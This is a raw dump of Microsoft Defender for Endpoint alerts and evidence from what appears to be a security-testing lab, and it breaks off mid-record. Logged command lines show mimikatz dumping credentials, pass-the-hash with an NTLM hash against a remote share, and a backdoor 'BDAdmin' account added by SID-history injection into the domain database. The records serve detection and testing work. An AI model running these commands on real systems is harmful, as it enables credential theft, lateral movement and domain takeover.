null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:57:32.0833333Z
Suspicious
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
4,216
ping 127.0.0.1
2022-12-22T08:47:50.8661147Z
748
2022-12-22T08:38:52.5569028Z
services.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
da638045930199785518_-1077336413
40b5c7bb-6b12-48ac-8955-75d8315f5afa
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:39.9785874Z
2022-11-21T03:45:17.6166667Z
2022-11-21T03:45:17.4759763Z
2022-11-21T02:01:37.421151Z
2022-11-21T02:01:45.2773414Z
Multiple dual-purpose tools were dropped
Multiple known public tools, which could also be used for malicious reasons were dropped on this device. Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement.
LateralMovement
Resolved
High
50
SuccessfullyRemediated
null
null
WindowsDefenderAtp
e0e0ea40-b5ca-4cbf-8380-24119951f847
null
null
null
[ "T1003", "T1021", "T1105", "T1555", "T1558.003", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Remediated", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Remediated", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586", "sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "9650845ba0de0cbce1d44db58a253ffa621566f6", "sha256": "b6d13138adcc4b856c9e7f427012bcce2e822a0228ca00fe13fd14eb56033483", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:29.9566667Z
Malicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d
8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b
explorer.exe
C:\Windows
1,896
Explorer.EXE
2022-12-22T08:26:24.0772409Z
2,796
2022-12-22T08:26:23.9030784Z
userinit.exe
C:\Windows\System32
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T09:02:48.4133333Z
Suspicious
None
jeff
vpn.zone
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:28:43.7466667Z
Suspicious
None
ronhd
vpn.zone
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:27:36.8066667Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.79Z
Suspicious
None
jeff
corp.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001158775309893_1845383221
da638001158775309893_1845383221
486
MicrosoftDefenderForEndpoint
2022-09-30T06:24:37.5311413Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:52.9900458Z
2022-09-30T06:11:54.4489902Z
Command line used for possible overpass-the-hash
A suspicious command line might have been used to perform an overpass-the-hash attack. This attack typically involves obtaining a password hash from memory and then using the ticket to authenticate.
LateralMovement
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
MTP
79ae2f5c-7394-4224-bae2-18fa2c975eec
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1550.002", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:24:37.61Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-08-23T12:15:55.5488781Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 416, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-09-30T06:11:13.210308Z", "processId": 4064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:24:37.61Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 4064, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-09-30T06:11:53.2107428Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:24:37.61Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:24:37.69Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt", "processCreationTime": "2022-09-30T06:11:53.3647591Z", "processId": 9680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:24:37.74Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-09-30T06:11:52.7127433Z", "processId": 2596, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:46.11Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,120
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv8.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-12-22T08:47:28.9856445Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638045935112835331_1703441138
b4f9432b-672b-474a-b166-2355402c25c3
765
MicrosoftDefenderForEndpoint
2022-11-21T02:11:51.283555Z
2022-11-21T02:36:06.49Z
null
2022-11-21T02:07:15.8950101Z
2022-11-21T02:34:30.3409598Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:11:51.33Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:11:51.33Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:07:15.1389846Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 7232, "processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-11-21T02:07:15.6313121Z", "processId": 3020, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:11:51.33Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 3020, "processCommandLine": "net.exe user /add BDAdmin Password1! ", "processCreationTime": "2022-11-21T02:07:15.6863696Z", "processId": 5996, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:06.4233333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:34:15.0073785Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 6984, "processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-11-21T02:34:15.4789089Z", "processId": 4960, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:06.4233333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 4960, "processCommandLine": "net.exe user /add BDAdmin Password1! ", "processCreationTime": "2022-11-21T02:34:15.5232143Z", "processId": 6372, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T16:08:26.02Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.97Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:30:16.59Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043450326836199_-712324832
3d94af3b-32d4-4606-9ee1-299138c18e8f
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:32.6836422Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:25.2290062Z
2022-11-18T05:13:25.7938668Z
Anomalous account lookups
An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ad0494b0-6cfa-4ba2-9285-706fd414acd8
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1069.001", "T1069.002", "T1087", "T1087.001", "T1087.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-18T05:09:25.177958Z", "processId": 4744, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-18T05:09:25.2555067Z", "processId": 10272, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": 